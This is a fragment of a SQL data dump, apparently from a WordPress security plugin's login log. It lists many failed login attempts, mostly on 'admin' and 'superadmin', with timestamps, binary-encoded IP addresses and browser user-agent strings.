Safari/537.36'),(5062,8375,1629493307.392172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5063,8376,1629493308.989693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5064,8377,1629493310.173386,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5065,8378,1629493311.351187,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5066,8379,1629493312.565830,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5067,8380,1629493313.782791,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5068,8383,1629493715.491427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5069,8384,1629493900.262594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5070,8385,1629494469.511603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Qq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5071,8386,1629494516.996763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5072,8387,1629494521.390672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5073,8388,1629494526.009011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5074,8390,1629495249.556747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5075,8391,1629495518.328234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5076,8391,1629495518.349154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5077,8392,1629496037.752109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����i_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5078,8393,1629496286.418864,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5079,8394,1629496294.305516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5080,8394,1629496294.825847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5081,8395,1629496302.197885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5082,8396,1629496311.034923,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5083,8397,1629496320.783522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5084,8397,1629496320.926549,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5085,8398,1629496332.332779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5086,8399,1629496337.516336,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5087,8400,1629496342.734155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5088,8401,1629496348.902519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5089,8401,1629496348.978672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5090,8402,1629496352.875356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5091,8403,1629496356.165738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5092,8403,1629496356.623220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5093,8404,1629496358.362839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5094,8405,1629496359.350118,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5095,8406,1629496360.408100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5096,8407,1629496361.385055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5097,8410,1629496571.570444,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5098,8411,1629496858.648552,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5099,8412,1629497128.344680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/`��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5100,8413,1629497717.876253,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5101,8443,1629500258.980206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�5?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5102,8445,1629501574.149032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5103,8446,1629501574.375090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5104,8447,1629501574.619434,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5105,8448,1629501574.866161,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5106,8449,1629501575.094193,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5107,8450,1629501575.353426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5108,8451,1629501575.649264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5109,8452,1629501575.860644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5110,8453,1629501576.078185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5111,8454,1629501576.303008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5112,8455,1629501576.524370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5113,8456,1629501576.741615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5114,8457,1629501576.940083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5115,8458,1629501577.178068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5116,8459,1629501577.380984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5117,8460,1629501577.570702,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5118,8461,1629501577.794268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5119,8462,1629501578.003293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5120,8463,1629501578.203511,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5121,8466,1629502041.519823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5122,8467,1629502452.366209,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(5123,8469,1629503559.359128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5124,8472,1629505173.164096,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5125,8473,1629505860.924545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5126,8475,1629506953.296734,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(5127,8476,1629507523.906120,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5128,8476,1629507523.947085,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5129,8477,1629507842.850851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@ts','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5130,8478,1629508264.421797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5131,8479,1629508265.495641,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5132,8480,1629508267.135881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5133,8481,1629508267.993110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5134,8482,1629508268.544724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5135,8483,1629508269.125872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5136,8484,1629508269.696302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5137,8485,1629508270.267577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5138,8486,1629508271.261683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5139,8487,1629508272.021418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5140,8488,1629508272.665392,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5141,8488,1629508272.762903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5142,8489,1629508273.306910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5143,8490,1629508273.886452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5144,8491,1629508274.490180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5145,8492,1629508275.029444,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5146,8494,1629508882.873427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5147,8496,1629510041.700302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5148,8499,1629510960.512413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5149,8500,1629511671.922084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5150,8501,1629512000.228120,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5151,8502,1629512000.470327,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5152,8503,1629512000.746384,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5153,8504,1629512001.019206,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5154,8505,1629512001.310218,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5155,8506,1629512001.664168,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5156,8507,1629512001.963356,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5157,8508,1629512002.246994,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5158,8509,1629512002.515313,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5159,8510,1629512003.092696,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5160,8511,1629512003.376609,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5161,8512,1629512003.643957,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5162,8513,1629512003.919133,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5163,8514,1629512004.208328,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5164,8515,1629512004.457383,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5165,8516,1629512004.753822,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5166,8517,1629512005.109060,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5167,8518,1629512005.372728,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5168,8519,1629512005.636319,1,'loginFailInvalidUsername','superadmin',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5169,8521,1629512039.845532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5170,8522,1629513143.878255,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5171,8523,1629514261.001082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5172,8524,1629514928.154629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/sM�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5173,8525,1629515373.425851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5174,8526,1629516521.940044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 